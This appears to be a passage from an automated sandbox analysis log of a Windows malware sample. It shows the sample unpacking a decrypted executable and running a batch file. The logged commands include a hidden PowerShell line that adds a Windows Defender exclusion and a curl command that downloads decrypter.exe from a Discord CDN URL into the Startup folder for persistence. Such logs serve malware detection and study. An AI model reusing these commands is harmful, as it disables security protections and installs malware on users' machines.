Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: file.exe, 00000000.00000000.2075118983.00007FF67BE59000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF7725B9000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: file.exe, 00000000.00000000.2075118983.00007FF67BE59000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF7725B9000.00000002.00000001.01000000.00000006.sdmp
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,4_2_000000014000D9C4
Source: file.exeStatic PE information: section name: _RDATA
Source: DataStore1.exe.8.drStatic PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_3_0245851C push edx; retn 0000h4_3_0245851D
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014001BD3E push rbx; ret 4_2_000000014001BD3F
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeJump to dropped file
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeJump to behavior
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeWindow / User API: threadDelayed 947Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6041Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3792Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exe TID: 4160Thread sleep count: 947 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 6041 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep count: 3792 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeFile opened: C:\Users\user\Jump to behavior
Source: file.exe, 00000000.00000002.2424482101.000001774FA38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: curl.exe, 00000008.00000003.2381803139.0000027ACC606000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,4_2_000000014000D9C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler,4_2_000000014000C4D0
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeCode function: 4_2_000000014001F888 RtlAddVectoredExceptionHandler,4_2_000000014001F888

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\decrypted_executable.exe C:\Users\user\AppData\Local\Temp\decrypted_executable.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_executable.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\ED33.tmp\ED34.tmp\ED35.bat C:\Users\user\AppData\Local\Temp\decrypted_executable.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -c Add-MpPreference -ExclusionPath ""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent --output "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent --output "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datastore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent --output "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\datastore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"Jump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
